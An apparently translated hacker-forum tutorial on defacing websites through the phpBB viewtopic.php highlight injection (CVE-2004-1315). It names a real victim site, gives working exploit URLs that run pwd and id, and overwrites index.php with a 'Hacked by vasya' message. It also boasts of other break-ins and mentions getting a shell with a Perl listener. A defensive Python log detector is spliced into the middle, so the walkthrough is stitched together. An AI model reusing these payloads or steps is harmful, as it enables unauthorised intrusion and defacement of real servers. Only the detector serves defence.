Complete guide to defacing (updated)

Introduction
I often see the question on the forum: "How do I hack a site?" or "How do I deface a site?". Today you will be able to deface a portal without any real effort. Lovers of easy prey, welcome! =)

Main part
Today I will talk about how to deface various sites through bugs in popular scripts. Recently a serious security hole was discovered in the popular phpBB forum engine.
The vulnerability is in the viewtopic.php module.

The point is that a remote attacker can execute arbitrary PHP code on an affected system by passing a query such as viewtopic.php?t=1&highlight=%27 . The highlight parameter is spliced into a preg_replace() call that uses the /e (eval) modifier, so a quote breaks out of the string and whatever follows it is run as PHP; and because PHP's register_globals is on, any other query parameter (in our case ls) becomes a variable the injected code can read. The bug affects phpBB 2.0.10 and earlier and was fixed in 2.0.11 (CVE-2004-1315).

As you have probably guessed, this vulnerability lets us run arbitrary commands of any length on a vulnerable server. Today we will use this hole and, together, break into a real server. Our goal is a deface, that is, replacing the site's main page with our own.

So, let's start. Our victim will be www.maxmuscle.dk (at the time of publication the portal is no longer vulnerable).
The first thing that catches the eye when visiting this page is that it is built on the PHP-Nuke portal system.

phpBB is the default forum in this system. We follow the link to the forum (http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&file=index.php) and confirm that this is phpBB version 2.0.6.

We pass the following query to the forum:

http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&file=viewtopic.php&t=2&highlight=%27.$poster=`$ls`.%27&ls=

And we find that the engine has swallowed the string, as evidenced by the characteristic text ") #i" shown in place of one user's nickname. By itself that does not prove much: command execution on this server might still fail on us, so rather than guess, we simply try it:

http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&file=viewtopic.php&t=2&highlight=%27.$poster=`$ls`.%27&ls=pwd

This command (pwd) should show us the directory we are currently in; if it does, command execution on the server is possible. And so it is: the path /var/www/html/osclux/ is displayed. The next command is id, to check what privileges we have.

As we can see, we have uid=99 (nobody), that is, the web server's privileges. Now we list the folders and files of the site's document root with the command "dir /var/www/html/osclux" and find that the index.php we need for the deface sits in this directory.

So, we are on the home stretch: by executing the command echo Hacked by vasya > index.php we put the text "Hacked by vasya" on the main page (the existing index.php is overwritten). We check. Done.
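As an added example that is not part of the original article, here is a Python detector for the attack sequence above as it would appear in a web server's access log. The log lines are constructed for the example (not taken from any real server) and the parser assumes the Apache combined log format. It decodes the highlight parameter repeatedly, so the double-encoded variant (%2527 instead of %27) is caught as well, and it also recognises the PHP-Nuke wrapper form (modules.php?...&file=viewtopic.php) used against this target.

```python
"""Flag phpBB viewtopic.php 'highlight' command-injection attempts in web server logs."""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Apache combined-log style (not from the original article).
# Lines 1, 2 and 4 carry injection payloads; lines 3 and 5 are ordinary requests.
SAMPLE_LOG = """\
10.0.0.1 - - [01/Jan/2005:10:00:00 +0000] "GET /forum/viewtopic.php?t=2&highlight=%27.$poster=`$ls`.%27&ls=pwd HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
10.0.0.2 - - [01/Jan/2005:10:00:01 +0000] "GET /forum/viewtopic.php?t=2&highlight=%2527.$poster=%60id%60.%2527 HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
10.0.0.3 - - [01/Jan/2005:10:00:02 +0000] "GET /forum/viewtopic.php?t=2&highlight=security HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
10.0.0.4 - - [01/Jan/2005:10:00:03 +0000] "GET /osclux/modules.php?op=modload&name=phpbb2&file=viewtopic.php&t=2&highlight=%27.$poster=`$ls`.%27&ls=id HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
10.0.0.5 - - [01/Jan/2005:10:00:04 +0000] "GET /index.php HTTP/1.1" 200 100 "-" "Mozilla/4.0"
"""

# Apache combined log: ip ident user [timestamp] "METHOD target PROTO" ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+"')

# A legitimate highlight value is a search word. A backtick, a PHP variable
# assignment ($name=...) or a quote followed by the '.' concatenation operator
# only make sense if the value is being evaluated as PHP.
PAYLOAD_RE = re.compile(r"`|\$\w+\s*=|'\s*\.")


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """URL-decode until the value stops changing, so %2527 -> %27 -> ' is caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def targets_viewtopic(path: str, params: Dict[str, List[str]]) -> bool:
    """True for a direct hit on viewtopic.php or a PHP-Nuke wrapper passing file=viewtopic.php."""
    if path.endswith("viewtopic.php"):
        return True
    return any(v.endswith("viewtopic.php") for v in params.get("file", []))


def analyze_request(target: str) -> Optional[Dict[str, Optional[str]]]:
    """Return details of an injection attempt found in one request target, or None."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)  # parse_qs decodes once
    if not targets_viewtopic(parts.path, params):
        return None
    for raw in params.get("highlight", []):
        decoded = decode_fully(raw)
        if PAYLOAD_RE.search(decoded):
            # The payload in the article runs `$ls`, and register_globals fills $ls
            # from the 'ls' query parameter, so that parameter is the shell command.
            # Other payload variants carry no 'ls', hence None.
            return {"highlight": decoded, "command": params.get("ls", [None])[0]}
    return None


def scan_log(text: str) -> List[Dict[str, Optional[str]]]:
    """Run analyze_request over every parseable log line and collect the hits."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = analyze_request(m.group("target"))
        if finding:
            finding.update(ip=m.group("ip"), time=m.group("ts"))
            hits.append(finding)
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} highlight={hit['highlight']!r} command={hit['command']!r}")
```

Running the file prints one line per hit with the decoded highlight value and, where present, the command passed in ls. A plain apostrophe in a genuine search term (don't) is deliberately not enough to trigger on its own; the rule needs a quote followed by the concatenation operator, a backtick, or a $name= assignment, which keeps false positives down while still matching both the single- and double-encoded forms.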

You have defaced the site.

Instead of a conclusion
It was in exactly this simple way that hackzona.ru was defaced, and that the forum on nsd.ru was broken into. I will also note that this is the simplest use of this hole: under good conditions you can just as easily upload a Perl script that listens on a chosen port and get a full shell with the rights of nobody.